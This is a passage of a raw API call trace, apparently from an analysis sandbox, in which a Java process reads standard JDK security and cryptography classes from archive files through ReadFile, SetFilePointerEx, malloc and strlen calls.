out: lpBuffer=0x12e6b280*, lpNumberOfBytesRead=0x208c2a0*=0xfd5, lpOverlapped=0x0) returned 1 [0117.631] free (_Block=0x12ef5010) [0117.631] free (_Block=0x12e60820) [0117.633] strlen (_Str="java/io/DataInput.class") returned 0x17 [0117.633] malloc (_Size=0x48) returned 0x12e602d0 [0117.633] malloc (_Size=0xa0) returned 0x12dabe10 [0117.633] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3408bc0, lpNewFilePointer=0x208bbb0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bbb0*=54561728) returned 1 [0117.633] ReadFile (in: hFile=0x134, lpBuffer=0x12dabe10, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bb80, lpOverlapped=0x0 | out: lpBuffer=0x12dabe10*, lpNumberOfBytesRead=0x208bb80*=0xa0, lpOverlapped=0x0) returned 1 [0117.633] malloc (_Size=0x18) returned 0x12db2170 [0117.634] strlen (_Str="java/io/DataInput.class") returned 0x17 [0117.634] strcpy (in: _Dest=0x208bd30, _Source="java/io/DataInput.class" | out: _Dest="java/io/DataInput.class") returned="java/io/DataInput.class" [0117.634] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2e617a2, lpNewFilePointer=0x208b7b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b7b0*=48633762) returned 1 [0117.634] ReadFile (in: hFile=0x134, lpBuffer=0x208b800, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b780, lpOverlapped=0x0 | out: lpBuffer=0x208b800*, lpNumberOfBytesRead=0x208b780*=0x1e, lpOverlapped=0x0) returned 1 [0117.634] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2e617d7, lpNewFilePointer=0x208b810, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b810*=48633815) returned 1 [0117.634] ReadFile (in: hFile=0x134, lpBuffer=0x12e6c3f0, nNumberOfBytesToRead=0x28b, lpNumberOfBytesRead=0x208b7e0, lpOverlapped=0x0 | out: lpBuffer=0x12e6c3f0*, lpNumberOfBytesRead=0x208b7e0*=0x28b, lpOverlapped=0x0) returned 1 [0117.634] free (_Block=0x12e66ca0) [0117.635] free (_Block=0x12e608c0) [0117.683] ReadFile (in: hFile=0x2d4, lpBuffer=0x208b410, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208b3e0, lpOverlapped=0x0 | out: lpBuffer=0x208b410*, lpNumberOfBytesRead=0x208b3e0*=0x2000, lpOverlapped=0x0) returned 1 [0117.688] strlen (_Str="sun/security/provider/JavaKeyStore$TrustedCertEntry.class") returned 0x39 [0117.688] malloc (_Size=0x48) returned 0x12e60cd0 [0117.688] malloc (_Size=0xa0) returned 0x12daae40 [0117.688] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33dc300, lpNewFilePointer=0x208c670, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c670*=54379264) returned 1 [0117.688] ReadFile (in: hFile=0x134, lpBuffer=0x12daae40, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c640, lpOverlapped=0x0 | out: lpBuffer=0x12daae40*, lpNumberOfBytesRead=0x208c640*=0xa0, lpOverlapped=0x0) returned 1 [0117.689] malloc (_Size=0x3a) returned 0x12e60550 [0117.690] strlen (_Str="sun/security/provider/JavaKeyStore$TrustedCertEntry.class") returned 0x39 [0117.690] strcpy (in: _Dest=0x208c7f0, _Source="sun/security/provider/JavaKeyStore$TrustedCertEntry.class" | out: _Dest="sun/security/provider/JavaKeyStore$TrustedCertEntry.class") returned="sun/security/provider/JavaKeyStore$TrustedCertEntry.class" [0117.690] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x280cc75, lpNewFilePointer=0x208c270, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c270*=41995381) returned 1 [0117.690] ReadFile (in: hFile=0x134, lpBuffer=0x208c2c0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c240, lpOverlapped=0x0 | out: lpBuffer=0x208c2c0*, lpNumberOfBytesRead=0x208c240*=0x1e, lpOverlapped=0x0) returned 1 [0117.691] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x280cccc, lpNewFilePointer=0x208c2d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c2d0*=41995468) returned 1 [0117.691] ReadFile (in: hFile=0x134, lpBuffer=0x20fe9e0, nNumberOfBytesToRead=0x1d6, lpNumberOfBytesRead=0x208c2a0, lpOverlapped=0x0 | out: lpBuffer=0x20fe9e0*, lpNumberOfBytesRead=0x208c2a0*=0x1d6, lpOverlapped=0x0) returned 1 [0117.691] free (_Block=0x12db2170) [0117.692] free (_Block=0x12e602d0) [0117.722] strlen (_Str="sun/security/ec/ECParameters") returned 0x1c [0117.723] strlen (_Str="sun/security/ec/ECParameters.class") returned 0x22 [0117.723] strlen (_Str="sun/security/ec/ECParameters.class") returned 0x22 [0117.723] strlen (_Str="sun/security/ec/ECParameters.class") returned 0x22 [0117.724] malloc (_Size=0x48) returned 0x12e60640 [0117.724] malloc (_Size=0xa0) returned 0x12dab940 [0117.724] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x9fa0, lpNewFilePointer=0x208b8f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b8f0*=40864) returned 1 [0117.724] ReadFile (in: hFile=0x2cc, lpBuffer=0x12dab940, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b8c0, lpOverlapped=0x0 | out: lpBuffer=0x12dab940*, lpNumberOfBytesRead=0x208b8c0*=0xa0, lpOverlapped=0x0) returned 1 [0117.725] malloc (_Size=0x23) returned 0x12e66d60 [0117.726] free (_Block=0x12ecf130) [0117.726] free (_Block=0x12ed32a0) [0117.731] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x28c9, lpNewFilePointer=0x2089af0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089af0*=10441) returned 1 [0117.731] ReadFile (in: hFile=0x2cc, lpBuffer=0x2089b40, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x2089ac0, lpOverlapped=0x0 | out: lpBuffer=0x2089b40*, lpNumberOfBytesRead=0x2089ac0*=0x1e, lpOverlapped=0x0) returned 1 [0117.731] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x2909, lpNewFilePointer=0x2089b50, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089b50*=10505) returned 1 [0117.731] ReadFile (in: hFile=0x2cc, lpBuffer=0x2089c60, nNumberOfBytesToRead=0x6f2, lpNumberOfBytesRead=0x2089b20, lpOverlapped=0x0 | out: lpBuffer=0x2089c60*, lpNumberOfBytesRead=0x2089b20*=0x6f2, lpOverlapped=0x0) returned 1 [0117.734] malloc (_Size=0xeaa) returned 0x12eea520 [0117.852] strlen (_Str="java/security/AlgorithmParametersSpi") returned 0x24 [0117.854] free (_Block=0x12eea520) [0117.856] strlen (_Str="java/security/spec/InvalidParameterSpecException") returned 0x30 [0117.856] strlen (_Str="java/security/spec/InvalidParameterSpecException.class") returned 0x36 [0117.856] malloc (_Size=0x48) returned 0x12e60690 [0117.856] malloc (_Size=0xa0) returned 0x12daace0 [0117.856] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33345a5, lpNewFilePointer=0x208a780, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208a780*=53691813) returned 1 [0117.856] ReadFile (in: hFile=0x134, lpBuffer=0x12daace0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208a750, lpOverlapped=0x0 | out: lpBuffer=0x12daace0*, lpNumberOfBytesRead=0x208a750*=0xa0, lpOverlapped=0x0) returned 1 [0117.858] malloc (_Size=0x37) returned 0x12ef4e50 [0117.858] strlen (_Str="java/security/spec/InvalidParameterSpecException.class") returned 0x36 [0117.858] strcpy (in: _Dest=0x208a900, _Source="java/security/spec/InvalidParameterSpecException.class" | out: _Dest="java/security/spec/InvalidParameterSpecException.class") returned="java/security/spec/InvalidParameterSpecException.class" [0117.859] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x17b43b9, lpNewFilePointer=0x208a380, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208a380*=24855481) returned 1 [0117.859] ReadFile (in: hFile=0x134, lpBuffer=0x208a3d0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208a350, lpOverlapped=0x0 | out: lpBuffer=0x208a3d0*, lpNumberOfBytesRead=0x208a350*=0x1e, lpOverlapped=0x0) returned 1 [0117.859] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x17b440d, lpNewFilePointer=0x208a3e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208a3e0*=24855565) returned 1 [0117.859] ReadFile (in: hFile=0x134, lpBuffer=0x12d8b560, nNumberOfBytesToRead=0x13b, lpNumberOfBytesRead=0x208a3b0, lpOverlapped=0x0 | out: lpBuffer=0x12d8b560*, lpNumberOfBytesRead=0x208a3b0*=0x13b, lpOverlapped=0x0) returned 1 [0117.859] free (_Block=0x12e60550) [0117.860] free (_Block=0x12e60cd0) [0117.863] strlen (_Str="java/security/GeneralSecurityException") returned 0x26 [0117.864] strlen (_Str="java/security/spec/AlgorithmParameterSpec") returned 0x29 [0117.865] strlen (_Str="java/security/InvalidKeyException") returned 0x21 [0117.866] strlen (_Str="java/security/InvalidKeyException.class") returned 0x27 [0117.866] malloc (_Size=0x48) returned 0x12e60b90 [0117.866] malloc (_Size=0xa0) returned 0x12dac9c0 [0117.866] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33f1462, lpNewFilePointer=0x208a780, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208a780*=54465634) returned 1 [0117.866] ReadFile (in: hFile=0x134, lpBuffer=0x12dac9c0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208a750, lpOverlapped=0x0 | out: lpBuffer=0x12dac9c0*, lpNumberOfBytesRead=0x208a750*=0xa0, lpOverlapped=0x0) returned 1 [0117.866] malloc (_Size=0x28) returned 0x12e66d30 [0117.866] strlen (_Str="java/security/InvalidKeyException.class") returned 0x27 [0117.867] strcpy (in: _Dest=0x208a900, _Source="java/security/InvalidKeyException.class" | out: _Dest="java/security/InvalidKeyException.class") returned="java/security/InvalidKeyException.class" [0117.867] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2b228e3, lpNewFilePointer=0x208a380, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208a380*=45230307) returned 1 [0117.867] ReadFile (in: hFile=0x134, lpBuffer=0x208a3d0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208a350, lpOverlapped=0x0 | out: lpBuffer=0x208a3d0*, lpNumberOfBytesRead=0x208a350*=0x1e, lpOverlapped=0x0) returned 1 [0117.870] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2b22928, lpNewFilePointer=0x208a3e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208a3e0*=45230376) returned 1 [0117.870] ReadFile (in: hFile=0x134, lpBuffer=0x12d8cfc0, nNumberOfBytesToRead=0x1bd, lpNumberOfBytesRead=0x208a3b0, lpOverlapped=0x0 | out: lpBuffer=0x12d8cfc0*, lpNumberOfBytesRead=0x208a3b0*=0x1bd, lpOverlapped=0x0) returned 1 [0117.870] free (_Block=0x12ef4e50) [0117.870] free (_Block=0x12e60690) [0117.872] strlen (_Str="java/security/KeyException.class") returned 0x20 [0117.872] malloc (_Size=0x48) returned 0x12e60a50 [0117.872] malloc (_Size=0xa0) returned 0x12daace0 [0117.872] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33f1414, lpNewFilePointer=0x2089d40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089d40*=54465556) returned 1 [0117.872] ReadFile (in: hFile=0x134, lpBuffer=0x12daace0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x2089d10, lpOverlapped=0x0 | out: lpBuffer=0x12daace0*, lpNumberOfBytesRead=0x2089d10*=0xa0, lpOverlapped=0x0) returned 1 [0117.872] malloc (_Size=0x21) returned 0x12e66760 [0117.873] strlen (_Str="java/security/KeyException.class") returned 0x20 [0117.873] strcpy (in: _Dest=0x2089ec0, _Source="java/security/KeyException.class" | out: _Dest="java/security/KeyException.class") returned="java/security/KeyException.class" [0117.873] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2b226e3, lpNewFilePointer=0x2089940, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089940*=45229795) returned 1 [0117.873] ReadFile (in: hFile=0x134, lpBuffer=0x2089990, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x2089910, lpOverlapped=0x0 | out: lpBuffer=0x2089990*, lpNumberOfBytesRead=0x2089910*=0x1e, lpOverlapped=0x0) returned 1 [0117.873] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2b22721, lpNewFilePointer=0x20899a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x20899a0*=45229857) returned 1 [0117.873] ReadFile (in: hFile=0x134, lpBuffer=0x12d8d320, nNumberOfBytesToRead=0x1c2, lpNumberOfBytesRead=0x2089970, lpOverlapped=0x0 | out: lpBuffer=0x12d8d320*, lpNumberOfBytesRead=0x2089970*=0x1c2, lpOverlapped=0x0) returned 1 [0117.873] free (_Block=0x12e66d30) [0117.873] free (_Block=0x12e60b90) [0117.883] strlen (_Str="sun/security/util/DerValue") returned 0x1a [0117.887] strlen (_Str="sun/security/ec/ECKeyFactory") returned 0x1c [0117.887] strlen (_Str="sun/security/ec/ECKeyFactory.class") returned 0x22 [0117.887] strlen (_Str="sun/security/ec/ECKeyFactory.class") returned 0x22 [0117.888] strlen (_Str="sun/security/ec/ECKeyFactory.class") returned 0x22 [0117.889] malloc (_Size=0x48) returned 0x12e60780 [0117.889] malloc (_Size=0xa0) returned 0x12dac860 [0117.889] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xa0f3, lpNewFilePointer=0x208b8d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b8d0*=41203) returned 1 [0117.889] ReadFile (in: hFile=0x2cc, lpBuffer=0x12dac860, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b8a0, lpOverlapped=0x0 | out: lpBuffer=0x12dac860*, lpNumberOfBytesRead=0x208b8a0*=0xa0, lpOverlapped=0x0) returned 1 [0117.889] malloc (_Size=0x23) returned 0x12e66940 [0117.890] free (_Block=0x12e66d60) [0117.891] free (_Block=0x12e60640) [0117.893] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x40e8, lpNewFilePointer=0x2089ad0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089ad0*=16616) returned 1 [0117.893] ReadFile (in: hFile=0x2cc, lpBuffer=0x2089b20, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x2089aa0, lpOverlapped=0x0 | out: lpBuffer=0x2089b20*, lpNumberOfBytesRead=0x2089aa0*=0x1e, lpOverlapped=0x0) returned 1 [0117.893] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x4128, lpNewFilePointer=0x2089b30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089b30*=16680) returned 1 [0117.893] ReadFile (in: hFile=0x2cc, lpBuffer=0x2089c40, nNumberOfBytesToRead=0x9be, lpNumberOfBytesRead=0x2089b00, lpOverlapped=0x0 | out: lpBuffer=0x2089c40*, lpNumberOfBytesRead=0x2089b00*=0x9be, lpOverlapped=0x0) returned 1 [0117.895] malloc (_Size=0x1577) returned 0x12d437b0 [0117.900] strlen (_Str="java/security/KeyFactorySpi") returned 0x1b [0117.902] free (_Block=0x12d437b0) [0117.903] strlen (_Str="java/security/NoSuchProviderException") returned 0x25 [0117.903] strlen (_Str="java/security/NoSuchProviderException.class") returned 0x2b [0117.903] malloc (_Size=0x48) returned 0x12e60820 [0117.904] malloc (_Size=0xa0) returned 0x12dac860 [0117.904] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3331cfa, lpNewFilePointer=0x208a6d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208a6d0*=53681402) returned 1 [0117.904] ReadFile (in: hFile=0x134, lpBuffer=0x12dac860, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208a6a0, lpOverlapped=0x0 | out: lpBuffer=0x12dac860*, lpNumberOfBytesRead=0x208a6a0*=0xa0, lpOverlapped=0x0) returned 1 [0117.904] malloc (_Size=0x2c) returned 0x12ef4bd0 [0117.905] strlen (_Str="java/security/NoSuchProviderException.class") returned 0x2b [0117.905] strcpy (in: _Dest=0x208a850, _Source="java/security/NoSuchProviderException.class" | out: _Dest="java/security/NoSuchProviderException.class") returned="java/security/NoSuchProviderException.class" [0117.905] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x1787517, lpNewFilePointer=0x208a2d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208a2d0*=24671511) returned 1 [0117.905] ReadFile (in: hFile=0x134, lpBuffer=0x208a320, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208a2a0, lpOverlapped=0x0 | out: lpBuffer=0x208a320*, lpNumberOfBytesRead=0x208a2a0*=0x1e, lpOverlapped=0x0) returned 1 [0117.905] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x1787560, lpNewFilePointer=0x208a330, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208a330*=24671584) returned 1 [0117.905] ReadFile (in: hFile=0x134, lpBuffer=0x12d8aa60, nNumberOfBytesToRead=0x130, lpNumberOfBytesRead=0x208a300, lpOverlapped=0x0 | out: lpBuffer=0x12d8aa60*, lpNumberOfBytesRead=0x208a300*=0x130, lpOverlapped=0x0) returned 1 [0117.906] free (_Block=0x12e66760) [0117.906] free (_Block=0x12e60a50) [0117.909] strlen (_Str="java/security/NoSuchAlgorithmException") returned 0x26 [0117.910] strlen (_Str="java/security/spec/InvalidKeySpecException") returned 0x2a [0117.911] strlen (_Str="java/security/spec/InvalidKeySpecException.class") returned 0x30 [0117.911] malloc (_Size=0x48) returned 0x12e60a00 [0117.911] malloc (_Size=0xa0) returned 0x12dabe10 [0117.911] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3334547, lpNewFilePointer=0x208a6d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208a6d0*=53691719) returned 1 [0117.911] ReadFile (in: hFile=0x134, lpBuffer=0x12dabe10, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208a6a0, lpOverlapped=0x0 | out: lpBuffer=0x12dabe10*, lpNumberOfBytesRead=0x208a6a0*=0xa0, lpOverlapped=0x0) returned 1 [0117.911] malloc (_Size=0x31) returned 0x12ef4910 [0117.911] strlen (_Str="java/security/spec/InvalidKeySpecException.class") returned 0x30 [0117.911] strcpy (in: _Dest=0x208a850, _Source="java/security/spec/InvalidKeySpecException.class" | out: _Dest="java/security/spec/InvalidKeySpecException.class") returned="java/security/spec/InvalidKeySpecException.class" [0117.911] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x17b4199, lpNewFilePointer=0x208a2d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208a2d0*=24854937) returned 1 [0117.911] ReadFile (in: hFile=0x134, lpBuffer=0x208a320, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208a2a0, lpOverlapped=0x0 | out: lpBuffer=0x208a320*, lpNumberOfBytesRead=0x208a2a0*=0x1e, lpOverlapped=0x0) returned 1 [0117.911] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x17b41e7, lpNewFilePointer=0x208a330, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208a330*=24855015) returned 1 [0117.912] ReadFile (in: hFile=0x134, lpBuffer=0x12d8b730, nNumberOfBytesToRead=0x1d2, lpNumberOfBytesRead=0x208a300, lpOverlapped=0x0 | out: lpBuffer=0x12d8b730*, lpNumberOfBytesRead=0x208a300*=0x1d2, lpOverlapped=0x0) returned 1 [0117.912] free (_Block=0x12ef4bd0) [0117.912] free (_Block=0x12e60820) [0117.920] strlen (_Str="java/security/Key") returned 0x11 [0117.923] strlen (_Str="java/security/PrivateKey") returned 0x18 [0117.924] strlen (_Str="java/security/PublicKey") returned 0x17 [0117.929] strlen (_Str="java/security/spec/X509EncodedKeySpec") returned 0x25 [0117.930] strlen (_Str="sun/security/ec/ECPublicKeyImpl") returned 0x1f [0117.931] strlen (_Str="sun/security/ec/ECPublicKeyImpl.class") returned 0x25 [0117.931] strlen (_Str="sun/security/ec/ECPublicKeyImpl.class") returned 0x25 [0117.931] strlen (_Str="sun/security/ec/ECPublicKeyImpl.class") returned 0x25 [0117.932] malloc (_Size=0x48) returned 0x12e60820 [0117.932] malloc (_Size=0xa0) returned 0x12daace0 [0117.932] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x9ca8, lpNewFilePointer=0x208ab80, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ab80*=40104) returned 1 [0117.932] ReadFile (in: hFile=0x2cc, lpBuffer=0x12daace0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ab50, lpOverlapped=0x0 | out: lpBuffer=0x12daace0*, lpNumberOfBytesRead=0x208ab50*=0xa0, lpOverlapped=0x0) returned 1 [0117.932] malloc (_Size=0x26) returned 0x12e66340 [0117.933] free (_Block=0x12e66940) [0117.934] free (_Block=0x12e60780) [0117.935] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xc72, lpNewFilePointer=0x2088d80, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2088d80*=3186) returned 1 [0117.935] ReadFile (in: hFile=0x2cc, lpBuffer=0x2088dd0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x2088d50, lpOverlapped=0x0 | out: lpBuffer=0x2088dd0*, lpNumberOfBytesRead=0x2088d50*=0x1e, lpOverlapped=0x0) returned 1 [0117.936] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xcb5, lpNewFilePointer=0x2088de0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2088de0*=3253) returned 1 [0117.936] ReadFile (in: hFile=0x2cc, lpBuffer=0x2088ef0, nNumberOfBytesToRead=0x6a3, lpNumberOfBytesRead=0x2088db0, lpOverlapped=0x0 | out: lpBuffer=0x2088ef0*, lpNumberOfBytesRead=0x2088db0*=0x6a3, lpOverlapped=0x0) returned 1 [0117.938] malloc (_Size=0xe62) returned 0x12d437b0 [0117.943] strlen (_Str="java/security/interfaces/ECPublicKey") returned 0x24 [0117.943] strlen (_Str="java/security/interfaces/ECPublicKey.class") returned 0x2a [0117.943] malloc (_Size=0x48) returned 0x12e60a50 [0117.944] malloc (_Size=0xa0) returned 0x12dabc00 [0117.944] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3333eda, lpNewFilePointer=0x20890d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x20890d0*=53690074) returned 1 [0117.944] ReadFile (in: hFile=0x134, lpBuffer=0x12dabc00, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x20890a0, lpOverlapped=0x0 | out: lpBuffer=0x12dabc00*, lpNumberOfBytesRead=0x20890a0*=0xa0, lpOverlapped=0x0) returned 1 [0117.944] malloc (_Size=0x2b) returned 0x12ef5610 [0117.944] strlen (_Str="java/security/interfaces/ECPublicKey.class") returned 0x2a [0117.944] strcpy (in: _Dest=0x2089250, _Source="java/security/interfaces/ECPublicKey.class" | out: _Dest="java/security/interfaces/ECPublicKey.class") returned="java/security/interfaces/ECPublicKey.class" [0117.944] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x17b063f, lpNewFilePointer=0x2088cd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2088cd0*=24839743) returned 1 [0117.944] ReadFile (in: hFile=0x134, lpBuffer=0x2088d20, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x2088ca0, lpOverlapped=0x0 | out: lpBuffer=0x2088d20*, lpNumberOfBytesRead=0x2088ca0*=0x1e, lpOverlapped=0x0) returned 1 [0117.945] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x17b0687, lpNewFilePointer=0x2088d30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2088d30*=24839815) returned 1 [0117.945] ReadFile (in: hFile=0x134, lpBuffer=0x20fe9b0, nNumberOfBytesToRead=0x10d, lpNumberOfBytesRead=0x2088d00, lpOverlapped=0x0 | out: lpBuffer=0x20fe9b0*, lpNumberOfBytesRead=0x2088d00*=0x10d, lpOverlapped=0x0) returned 1 [0117.945] free (_Block=0x12ef4910) [0117.946] free (_Block=0x12e60a00) [0117.947] strlen (_Str="java/security/interfaces/ECKey.class") returned 0x24 [0117.947] malloc (_Size=0x48) returned 0x12e60a00 [0117.947] malloc (_Size=0xa0) returned 0x12dac2e0 [0117.947] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3333e2f, lpNewFilePointer=0x2088610, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2088610*=53689903) returned 1 [0117.948] ReadFile (in: hFile=0x134, lpBuffer=0x12dac2e0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x20885e0, lpOverlapped=0x0 | out: lpBuffer=0x12dac2e0*, lpNumberOfBytesRead=0x20885e0*=0xa0, lpOverlapped=0x0) returned 1 [0117.948] malloc (_Size=0x25) returned 0x12e66a90 [0117.948] strlen (_Str="java/security/interfaces/ECKey.class") returned 0x24 [0117.948] strcpy (in: _Dest=0x2088790, _Source="java/security/interfaces/ECKey.class" | out: _Dest="java/security/interfaces/ECKey.class") returned="java/security/interfaces/ECKey.class" [0117.948] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x17b041c, lpNewFilePointer=0x2088210, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2088210*=24839196) returned 1 [0117.948] ReadFile (in: hFile=0x134, lpBuffer=0x2088260, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x20881e0, lpOverlapped=0x0 | out: lpBuffer=0x2088260*, lpNumberOfBytesRead=0x20881e0*=0x1e, lpOverlapped=0x0) returned 1 [0117.948] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x17b045e, lpNewFilePointer=0x2088270, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2088270*=24839262) returned 1 [0117.948] ReadFile (in: hFile=0x134, lpBuffer=0x12d8a0c0, nNumberOfBytesToRead=0x8f, lpNumberOfBytesRead=0x2088240, lpOverlapped=0x0 | out: lpBuffer=0x12d8a0c0*, lpNumberOfBytesRead=0x2088240*=0x8f, lpOverlapped=0x0) returned 1 [0117.949] free (_Block=0x12ef5610) [0117.949] free (_Block=0x12e60a50) [0117.988] strlen (_Str="sun/security/x509/X509Key") returned 0x19 [0117.990] free (_Block=0x12d437b0) [0117.999] strlen (_Str="sun/security/x509/AlgorithmId") returned 0x1d [0118.000] strlen (_Str="java/security/AlgorithmParameters") returned 0x21 [0118.003] strlen (_Str="java/lang/Class") returned 0xf [0118.005] strlen (_Str="sun/security/util/ECUtil") returned 0x18 [0118.005] strlen (_Str="sun/security/util/ECUtil.class") returned 0x1e [0118.005] malloc (_Size=0x48) returned 0x12e603c0 [0118.006] malloc (_Size=0xa0) returned 0x12dab100 [0118.006] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33e30d1, lpNewFilePointer=0x208b240, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b240*=54407377) returned 1 [0118.006] ReadFile (in: hFile=0x134, lpBuffer=0x12dab100, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b210, lpOverlapped=0x0 | out: lpBuffer=0x12dab100*, lpNumberOfBytesRead=0x208b210*=0xa0, lpOverlapped=0x0) returned 1 [0118.006] malloc (_Size=0x1f) returned 0x12e66550 [0118.006] strlen (_Str="sun/security/util/ECUtil.class") returned 0x1e [0118.006] strcpy (in: _Dest=0x208b3c0, _Source="sun/security/util/ECUtil.class" | out: _Dest="sun/security/util/ECUtil.class") returned="sun/security/util/ECUtil.class" [0118.007] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x294bbe3, lpNewFilePointer=0x208ae40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ae40*=43301859) returned 1 [0118.007] ReadFile (in: hFile=0x134, lpBuffer=0x208ae90, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208ae10, lpOverlapped=0x0 | out: lpBuffer=0x208ae90*, lpNumberOfBytesRead=0x208ae10*=0x1e, lpOverlapped=0x0) returned 1 [0118.008] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x294bc1f, lpNewFilePointer=0x208aea0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208aea0*=43301919) returned 1 [0118.008] ReadFile (in: hFile=0x134, lpBuffer=0x12d89f70, nNumberOfBytesToRead=0xf0c, lpNumberOfBytesRead=0x208ae70, lpOverlapped=0x0 | out: lpBuffer=0x12d89f70*, lpNumberOfBytesRead=0x208ae70*=0xf0c, lpOverlapped=0x0) returned 1 [0118.009] free (_Block=0x12e66a90) [0118.010] free (_Block=0x12e60a00) [0118.065] strlen (_Str="sun/security/x509/CRLDistributionPointsExtension") returned 0x30 [0118.065] strlen (_Str="sun/security/x509/CRLDistributionPointsExtension.class") returned 0x36 [0118.065] malloc (_Size=0x48) returned 0x12e602d0 [0118.065] malloc (_Size=0xa0) returned 0x12dabd60 [0118.065] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33e4439, lpNewFilePointer=0x208c6e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c6e0*=54412345) returned 1 [0118.065] ReadFile (in: hFile=0x134, 